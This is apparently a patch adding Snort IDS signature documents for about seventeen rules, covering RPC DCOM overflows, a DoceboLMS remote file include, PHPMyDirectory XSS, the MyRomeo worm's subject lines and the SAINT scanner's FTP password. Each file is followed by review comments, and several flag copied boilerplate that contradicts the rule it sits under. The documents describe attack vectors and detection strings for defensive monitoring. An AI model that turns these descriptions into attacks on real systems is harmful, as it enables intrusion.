+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_sp_pa-pz_5x44.asp
+
+--
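Review bot: "Attack Scenarios: Simple. These are SQL database commands." is an Ease of Attack answer, not a scenario; the scenario (a source outside the protected network reaching the SQL port and issuing the command the Summary refers to) belongs here. The paragraph "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" reads as copied from a telnet signature document and does not fit an SQL rule; drop it or reword it for the SQL session. The document also never names the command Sid 677 matches even though the MSDN reference points at a specific stored-procedure page. Minor: the separators alternate between "--" and "-- " with extra blank lines, and "investigate the server for signs of compromise" lacks its period.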
--- /dev/null
+++ b/doc/signatures/100000525.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000525
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "PHPMyDirectory" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "PIC" parameter in the "offer-pix.php" script 
+used by the "PHPMyDirectory" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMyDirectory
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
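Review bot: the "--" separators after the Sid, after "All systems running CGI applications using PHPMyDirectory" and after the Contributors list lack the blank line that precedes every other separator; make them consistent. The Impact wording and the "execute system binaries" sentence are the generic CGI boilerplate and overstate a reflected XSS in the "PIC" parameter of "offer-pix.php", whose realistic effect is the information theft the Attack Scenarios entry describes. Also "attackers choosing" should be "attacker's choosing".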
--- /dev/null
+++ b/doc/signatures/3072.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3072
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"status" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
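Review bot: "An attacker can supplied an overly long command" should be "can supply", and "a buffer overflow associated with the several commands of an IMAP service" should drop "the". The Summary says the rule watches the argument of the "status" command but gives no length threshold; stating the size the rule triggers on would let an operator judge whether the "None known" False Negatives entry holds. Additional References is empty although Affected Systems cites two specific Mercury versions, so the vendor advisory should be cited, and "Brian Caswell<bmc@sourcefire.com>" needs a space before the address.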
--- /dev/null
+++ b/doc/signatures/473.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+473
+
+--
+Summary:
+This event is generated when an ICMP Redirect Network message was
+detected in network traffic.
+
+--
+Impact:
+Unknown. Possible system crash, Denial of Service (DoS) for some
+embedded operating systems.
+
+--
+Detailed Information:
+Several susceptible IP Stack implementations may result in the system
+hanging or crashing when malformed or corrupted ICMP Redirect Network
+(Type 5, Code 0) packets are sent to them.  This vulnerability was first
+discovered in 1997.
+
+Under normal network conditions ICMP Redirect Network packets will occur
+in a number of situations. One such situation is when a host is on a
+subnet with more than one router. The host can only have one default
+gateway, and forwards all traffic for networks outside its own subnet to
+this gateway. If the default gateway detects that the gateway for this
+route is on the same subnet as the originating host, the default gateway
+forwards the packet onto this gateway and sends an ICMP Redirect Network
+to the originating host.
+
+This funtionality exists primarily to save network administrators from
+having to keep extensive routing tables on hosts, the host will remember
+the route learned from the ICMP Redirect Network message for a period of
+time, and will forward any traffic directly while it has the route in
+its cache.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+A malicious user may send corrupted ICMP Redirect Net messages to
+networks in an attempt to crash a system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Any ICMP Network Redirect will generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches for Microsoft Windows NT 4.0 were included in SP4, and also
+release as a post SP3 fix - teardrop2-fix.  Fixes are also available for
+Windows 95 and various embedded systems.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft KB, Q154174
+--
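Review bot: the False Positives entry "Any ICMP Network Redirect will generate an event" means this rule fires on the normal routing behaviour that Detailed Information describes at length, so Corrective Action should also tell the operator how to tune it (for example restricting it to external source addresses) and note that hosts can be configured to ignore ICMP redirects, rather than only pointing at 1997-era Windows patches. Typos: "funtionality" (functionality), "unkown" (unknown), "release as a post SP3 fix" (released); "ICMP Redirect Net" in Attack Scenarios should match "Redirect Network" used elsewhere; and the "Microsoft KB, Q154174" reference has no URL and no blank line before the closing "--".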
--- /dev/null
+++ b/doc/signatures/100000341.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000341
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DoceboLMS" application running on a webserver. Access to the file "help.php" using a remote file being passed as the "lang" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lang" parameter in the "help.php" script used by the "DoceboLMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DoceboLMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
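Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server...") and the Attack Scenarios entry about supplying credentials are the generic CGI boilerplate and contradict the first paragraph, which correctly describes a remote file include via the "lang" parameter of "help.php"; drop them and describe the actual scenario, a URL pointing at an attacker-controlled file being passed as "lang". Additional References is empty for a named application and parameter, and "ona" should be "on a".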
--- /dev/null
+++ b/doc/signatures/1560.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1560
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
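Review bot: "Many known vulnerabilities exist for each implementation and the attack scenarios are legion" tells the reader nothing about what Sid 1560 matches; Detailed Information should name the URI or pattern the rule looks for, and the Additional References section is empty. The paragraph about validating "the credentials of a client host" is the same boilerplate as the CGI documents earlier in the patch and should be replaced with text specific to this rule.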
--- /dev/null
+++ b/doc/signatures/358.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+358
+
+--
+
+Summary:
+This event is generated when an attempt is made to login anonymously 
+into an ftp server using a suspicious password (-saint)
+
+--
+
+Impact:
+Possible unauthorized access. Information gathering.
+
+--
+
+Detailed Information:
+Saint is an open-source security scanner which checks for common 
+vulnerabilities. When it detects an open ftp server, it tries to log in 
+anonymously using the password '-saint'
+
+--
+
+Affected Systems:
+Machines running anonymous ftp servers.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs using the Saint Scanner, checking for 
+known vulnerabilities. If the scanner encounters a ftp server, it tries 
+to log in .
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+A user may be using that same password for a legitimate 
+anonymous login.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable anonymous FTP access.
+
+--
+
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS330
+
+--
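Review bot: "login anonymously into an ftp server" should be "log in anonymously to an FTP server", and "tries to log in ." has a stray space before the period. The Summary and Detailed Information sentences end without periods after "(-saint)" and "'-saint'", "ftp" and "FTP" are mixed, and the "-- " separator before Additional References carries a trailing space. The Corrective Action "Disable anonymous FTP access." is a policy decision rather than a response to a scanner probe; where anonymous FTP is required, the advice should be to verify the server is patched and to look for follow-up events from the same source, which is what the Saint scan described in Attack Scenarios would produce.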
--- /dev/null
+++ b/doc/signatures/838.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+838
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
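Review bot: this file is identical to 866.txt and 1539.txt earlier in the patch except for the Sid, including "running ona web server"; it should document which CGI program rule 838 matches and cite its advisory in the empty Additional References section.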
--- /dev/null
+++ b/doc/signatures/2445.txt
@@ -0,0 +1,82 @@
+Rule:  
+
+--
+Sid:
+2445
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in multiple versions of Internet Security Systems software.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible leading to unauthorized 
+access to the affected host. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the way that multiple ISS products parse ICQ
+messages. This can lead to execution of arbitrary code on hosts using
+the affected products.
+
+Due to insufficient bounds checking when ISS products parse protocol
+fields in ICQ SRV_META_USER data, a buffer overflow condition can be
+exploited to give an attacker the opportunity to execute arbitrary code
+and gain unauthorized administrative access to the host.
+
+It is possible that this condition can be exploited without the need for
+an established and valid ICQ session. The attacker could create packets
+originating from a host on port 4000 and send specially crafted data to 
+exploit the condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 22.11 and prior
+	RealSecure Server Sensor 7.0 XPU 22.11 and prior
+	RealSecure Server Sensor 6.5 for Windows SR 3.10 and prior
+	Proventia A Series XPU 22.11 and prior
+	Proventia G Series XPU 22.11 and prior
+	Proventia M Series XPU 1.9 and prior
+	RealSecure Desktop 7.0 ebl and prior
+	RealSecure Desktop 3.6 ecf and prior
+	RealSecure Guard 3.6 ecf and prior
+	RealSecure Sentry 3.6 ecf and prior
+	BlackICE Agent for Server 3.6 ecf and prior
+	BlackICE PC Protection 3.6 ccf and prior
+	BlackICE Server Protection 3.6 ccf and prior
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
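Review bot: Additional References is empty although Affected Systems lists thirteen specific ISS product versions and Detailed Information names the ICQ SRV_META_USER parsing flaw; cite the vendor advisory those version numbers come from. If the rule keys on source port 4000, as the sentence "The attacker could create packets originating from a host on port 4000" implies, False Negatives should say that the same data on another port would be missed instead of "None known". Minor: "Apply the appropriate vendor supplied patches" lacks a period, and "Rule:  " and the closing "-- " carry trailing spaces.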
--- /dev/null
+++ b/doc/signatures/3293.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3293
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
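Review bot: the Attack Scenarios entry "An attacker may make a request for a file with an overly long filename via a network share" describes a file-share attack, not the malformed RPC request to DCOM that Detailed Information describes; it appears copied from another document and should be replaced with the RPC scenario. "Expoit code exists" should be "Exploit", and Additional References is empty for a vulnerability that has a vendor advisory, which should be cited.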
--- /dev/null
+++ b/doc/signatures/1024.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1024
+
+--
+Summary:
+This event is generated when an attempt is made to access the newdsn.exe file, which is a sample program installed with Internet Information Server (IIS) 3.0. 
+
+--
+Impact:
+File creation.  This attack can allow the creation of a new Microsoft Access Database (.mdb) file on the vulnerable server.
+
+--
+Detailed Information:
+IIS 3.0 comes with a sample program newdsn.exe.  An attacker can craft a URL to reference this executable and, as a parameter, pass the name of a new file to be created.  The file may have any extension, but will be considered a Microsoft Access Database file. 
+
+--
+Affected Systems:
+IIS 3.0 servers
+
+--
+Attack Scenarios:
+An attacker can craft a URL to execute the vulnerable newdsn.exe and create a Microsoft Access Database file on the vulnerable server. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete the newdsn.exe file.
+
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0191
+
+
+--
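Review bot: the sentence "The file may have any extension, but will be considered a Microsoft Access Database file" is ambiguous; state whether newdsn.exe writes an Access-format file regardless of the name supplied, which is what the Impact section implies. Since the Summary identifies newdsn.exe as a sample program, the Corrective Action "Delete the newdsn.exe file." could usefully extend to removing the IIS sample applications altogether. Formatting: the line after "Upgrade to a more current version of IIS." contains a lone space, and two blank lines precede the closing "--".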
--- /dev/null
+++ b/doc/signatures/1918.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1918
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain which ports a host may be listening on, whether or not the ports are filtered by a firewall and if the host is vulnerable to a particular exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. Then the attacker might find out that the FTP service is vulnerable to a particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
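Review bot: "This event is generated when a scan is detected." and "an attempt has been made to scan a host" never say which scanner or probe pattern Sid 1918 matches, so the False Positives entry ("A scanner may be used in a security audit") cannot be evaluated; name the tool or request the rule keys on and cite it in the empty Additional References section. The Attack Scenarios example about ports 21 and 20 reads as a generic port-scan description rather than this rule's behaviour.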
--- /dev/null
+++ b/doc/signatures/1423.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1423
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
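Review bot: Nothing in this file says what sid 1423 actually matches: Summary, Detailed Information, Affected Systems ("All systems running PHP applications") and the empty Additional References are the generic PHP-application template shared with other sids in this patch. Add at least the URI or parameter the rule inspects and the application it belongs to, otherwise an analyst triaging this alert learns nothing from the page. Minor: "running ona web server" in Detailed Information should be "running on a web server".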
--- /dev/null
+++ b/doc/signatures/376.txt
@@ -0,0 +1,56 @@
+Rule:
+--
+
+Sid:
+376
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS159
+
+--
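Review bot: The Corrective Action "Block inbound ICMP echo requests" is broader than the rule warrants, and the False Positives entry is incomplete: Detailed Information says the rule keys on the payload Windows places in its echo requests, so every routine ping from a Windows host matches, not only deliberate troubleshooting. Say so in False Positives, and scope the blocking advice to the perimeter (ingress from untrusted networks) rather than all inbound echo requests. Also "legimately" should be "legitimately", and the header order at the top (`Rule:` then `--` then a blank line before `Sid:`) differs from the other files in this patch.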
--- /dev/null
+++ b/doc/signatures/3239.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3239
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
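Review bot: Attack Scenarios contradicts Detailed Information: the latter describes a malformed DCOM request arriving over RPC, while the scenario describes a request for a file with an overly long filename via a network share. Reconcile the two by stating which field is overlong and over which transport it arrives, so a reader can tell what the rule matches. Corrective Action calls 135, 139 and 445 "RPC ports"; 135 is the RPC endpoint mapper, whereas 139 and 445 are the NetBIOS/SMB ports over which RPC is carried in named pipes, so qualify that wording. "Expoit code exists" should read "Exploit code exists", and Additional References is empty for a vulnerability that has a vendor bulletin.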
--- /dev/null
+++ b/doc/signatures/2348.txt
@@ -0,0 +1,53 @@
+Rule:  
+
+--
+Sid:
+2348
+
+--
+Summary:
+This rule does not generate an event. I does activate sid 2349 however.s
+
+--
+Impact:
+Intelligence gathering.
+
+--
+Detailed Information:
+This rule checks for a bind to a print spool using DCE RPC. This may be
+an attempt to check for printer and printer services available on a
+host. Sid 2349 will generate an event when an attempt is made to
+enumerate the printer service on a host.
+
+--
+Affected Systems:
+	All Microsoft DCE RPC enabled systems
+	
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
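Review bot: The Summary line "This rule does not generate an event. I does activate sid 2349 however.s" carries two typos ("I does" should be "It does"; the trailing "s" is stray). Attack Scenarios and Corrective Action are empty headings: for an activation rule either describe the enumeration step that sid 2349 then reports and how to restrict access to the print spooler interface over DCE RPC, or state explicitly that the sections are blank because the rule on its own raises no alert.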
--- /dev/null
+++ b/doc/signatures/727.txt
@@ -0,0 +1,91 @@
+Rule:
+
+--
+Sid:
+727
+
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
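Review bot: Spelling in Summary and Detailed Information: "specifcally" should be "specifically", "propogation"/"propogates" should be "propagation"/"propagates", and "WIndows" should be "Windows"; "also Known As" needs a lowercase "known". The False Positives entry correctly notes that the match is on the subject lines listed under Attack Scenarios; consider saying in Detailed Information that the rule matches on those SMTP subject strings, so the reader knows why legitimate mail with "hello world" or "my picture" will fire it.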
